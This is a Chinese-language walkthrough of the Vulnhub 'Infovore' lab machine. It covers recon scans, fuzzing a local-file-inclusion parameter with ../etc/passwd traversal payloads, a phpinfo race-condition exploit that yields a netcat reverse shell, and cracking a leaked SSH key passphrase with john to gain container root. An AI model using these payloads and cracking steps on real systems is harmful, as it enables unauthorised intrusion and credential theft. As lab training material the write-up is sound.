Infovore Vulnhub
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.63.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:3b:85:70 1 60 PCS Systemtechnik GmbH
192.168.56.166 08:00:27:79:fd:9d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.166
NMAP 扫描
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.166 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 02:06 EST
Nmap scan report for bogon (192.168.56.166)
Host is up (0.000094s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Include me ...
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:79:FD:9D (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
Get Access
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ curl http://192.168.56.166/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.166 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.166
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/09 02:08:25 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 314] [--> http://192.168.56.166/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.166/css/]
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.166/vendor/]
/server-status (Status: 403) [Size: 279]
Progress: 218349 / 220561 (99.00%)===============================================================
2022/11/09 02:09:07 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.166
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: sh,php,txt,html
[+] Timeout: 10s
===============================================================
2022/11/09 02:09:18 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 4674]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 4743]
/img (Status: 301) [Size: 314] [--> http://192.168.56.166/img/]
/info.php (Status: 200) [Size: 69802]
/css (Status: 301) [Size: 314] [--> http://192.168.56.166/css/]
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.166/vendor/]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1102635 / 1102805 (99.98%)===============================================================
2022/11/09 02:13:23 Finished
=============┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ dirb http://192.168.56.166
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 9 02:15:33 2022
URL_BASE: http://192.168.56.166/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.166/ ----
==> DIRECTORY: http://192.168.56.166/css/
==> DIRECTORY: http://192.168.56.166/img/
+ http://192.168.56.166/index.html (CODE:200|SIZE:4674)
+ http://192.168.56.166/index.php (CODE:200|SIZE:4743)
+ http://192.168.56.166/info.php (CODE:200|SIZE:69868)
+ http://192.168.56.166/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.166/vendor/
---- Entering directory: http://192.168.56.166/css/ ----
---- Entering directory: http://192.168.56.166/img/ ----
---- Entering directory: http://192.168.56.166/vendor/ ----
==> DIRECTORY: http://192.168.56.166/vendor/jquery/
---- Entering directory: http://192.168.56.166/vendor/jquery/ ----
-----------------
END_TIME: Wed Nov 9 02:15:44 2022
DOWNLOADED: 23060 - FOUND: 4
==================================================
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ curl http://192.168.56.166/info.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
th {position: sticky; top: 0; background: inherit;}
h1 {font-size: 150%;}
存在index.html, index.php,是不是有本地文件包含,因此FUZZ一下有什么参数
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ wfuzz -c -u http://192.168.56.166/index.php?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 382
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.166/index.php?FUZZ=../../../../../../etc/passwd
Total requests: 4713
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 3.665230
Processed Requests: 4713
Filtered Requests: 4713
Requests/sec.: 1285.867
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ wfuzz -c -u http://192.168.56.166/?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 382
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.166/?FUZZ=../../../../../../etc/passwd
Total requests: 4713
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 0
Processed Requests: 4713
Filtered Requests: 4713
Requests/sec.: 0
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ wfuzz -c -u http://192.168.56.166/index.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 382
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.166/index.php?FUZZ=../../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000025370: 200 7 L 9 W 80 Ch "filename"
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
Total time: 72.24588
Processed Requests: 30224
Filtered Requests: 30223
Requests/sec.: 418.3490
值得注意的是,用了不同的字典,最后才将参数FUZZ出来。
手动确认一下:
http://192.168.56.166/index.php?filename=/etc/passwd
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ curl http://192.168.56.166/index.php?filename=/etc/passwd
<html>
<title>Include me ...</title>
<body>
<p>
<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
</pre></p>
</body>
</html>
而且这里如果加多层../../../../../etc/passwd,返回结果是空(不是出错)
但是只能读取/etc/passwd这一个文件,其他文件无法读取。
http://192.168.56.166/index.php?filename=php://filter/convert.base64-encode/resource=index
用这种filter也不能奏效,无法读取文件源代码。
这里目标主机的漏洞是允许info.php,以及LFI,参考下面的文章:
https://rafalharazinski.gitbook.io/security/other-web-vulnerabilities/local-remote-file-inclusion/phpinfo-log-race-condition
修改里面phpinfo.php为info.php, 参数名称为filename, 成功得到shell:
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.166] 44473
Linux e71b67461f6c 3.16.0-6-amd64 #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) x86_64 GNU/Linux
15:53:02 up 49 min, 0 users, load average: 2.80, 0.58, 0.35
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
$ bash -i
www-data@e71b67461f6c:/$ cd /var/www/html
cd /var/www/html
www-data@e71b67461f6c:/var/www/html$ ls
ls
css
gulpfile.js
img
index.html
index.php
info.php
package-lock.json
package.json
scss
vendor
www-data@e71b67461f6c:/var/www/html$ ls -alh
ls -alh
total 312K
drwxrwxrwx 6 www-data www-data 4.0K Jun 22 2020 .
drwxr-xr-x 5 root root 4.0K Jun 22 2020 ..
-r--r--r-- 1 root root 42 Jun 22 2020 .user.txt
drwxr-xr-x 2 root root 4.0K Apr 27 2020 css
-rw-r--r-- 1 root root 2.5K Sep 16 2019 gulpfile.js
drwxr-xr-x 2 root root 4.0K Apr 27 2020 img
-rw-r--r-- 1 root root 4.6K Sep 16 2019 index.html
-rw-r--r-- 1 root root 416 Jun 1 2020 index.php
-rw-r--r-- 1 root root 19 Apr 26 2020 info.php
-rw-r--r-- 1 root root 257K Sep 16 2019 package-lock.json
-rw-r--r-- 1 root root 1.3K Sep 16 2019 package.json
drwxr-xr-x 2 root root 4.0K Apr 27 2020 scss
drwxr-xr-x 4 root root 4.0K Sep 16 2019 vendor
www-data@e71b67461f6c:/var/www/html$ cat .user.txt
cat .user.txt
FLAG{Now_You_See_phpinfo_not_so_harmless}
www-data@e71b67461f6c:/var/www/html$ hostname
hostname
e71b67461f6c
www-data@e71b67461f6c:/var/www/html$ cd /
cd /
www-data@e71b67461f6c:/$ ls -alh
ls -alh
total 464K
drwxr-xr-x 74 root root 4.0K Jun 23 2020 .
drwxr-xr-x 74 root root 4.0K Jun 23 2020 ..
-rwxr-xr-x 1 root root 0 Jun 22 2020 .dockerenv
-rw-r--r-- 1 root root 1.2K Apr 27 2020 .oldkeys.tgz
drwxr-xr-x 2 root root 4.0K Jun 9 2020 bin
drwxr-xr-x 2 root root 4.0K May 2 2020 boot
-rw------- 1 root root 388K Jun 22 2020 core
drwxr-xr-x 5 root root 360 Nov 9 15:03 dev
drwxr-xr-x 63 root root 4.0K Jun 22 2020 etc
drwxr-xr-x 2 root root 4.0K May 2 2020 home
drwxr-xr-x 13 root root 4.0K Jun 9 2020 lib
drwxr-xr-x 2 root root 4.0K Jun 7 2020 lib64
drwxr-xr-x 2 root root 4.0K Jun 7 2020 media
drwxr-xr-x 2 root root 4.0K Jun 7 2020 mnt
drwxr-xr-x 2 root root 4.0K Jun 7 2020 opt
dr-xr-xr-x 95 root root 0 Nov 9 15:03 proc
drwx------ 4 root root 4.0K Jun 23 2020 root
drwxr-xr-x 6 root root 4.0K Jun 22 2020 run
drwxr-xr-x 2 root root 4.0K Jun 9 2020 sbin
drwxr-xr-x 2 root root 4.0K Jun 7 2020 srv
dr-xr-xr-x 13 root root 0 Nov 9 15:03 sys
drwxrwxrwt 2 root root 4.0K Nov 9 15:53 tmp
drwxr-xr-x 41 root root 4.0K Jun 22 2020 usr
drwxr-xr-x 31 root root 4.0K Jun 22 2020 var
www-data@e71b67461f6c:/$
得到第一个flag
.oldkeys.tgz引起我们的注意,将其拷贝至网站根目录,这样我们可以下载到Kali Linux本地
提权
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ tar -xzvf oldkeys.tgz
root
root.pub
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ ls
exploit.py nmap_full_scan oldkeys.tgz root root.pub
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ ssh2john root > root_hash
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ ls
exploit.py nmap_full_scan oldkeys.tgz root root_hash root.pub
┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt root_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
choclate93 (root)
1g 0:00:00:03 DONE (2022-11-09 02:58) 0.2832g/s 2581Kp/s 2581Kc/s 2581KC/s choclatedrop..choclate76
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
破解出私钥的口令。
这个口令直接是container的root用户的口令
www-data@e71b67461f6c:/var/www/html$ su - root
su - root
Password: choclate93
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 24K
drwx------ 4 root root 4.0K Jun 23 2020 .
drwxr-xr-x 75 root root 4.0K Nov 9 15:56 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Jun 23 2020 .ssh
-r-------- 1 root root 79 Jun 22 2020 root.txt
cat root.txt
FLAG{Congrats_on_owning_phpinfo_hope_you_enjoyed_it}
And onwards and upwards!
但目前为止我们都仍然在container容器里
标签:56.166,..,kali,192.168,解题,Vulnhub,http,root,Infovore From: https://www.cnblogs.com/jason-huawen/p/16874237.html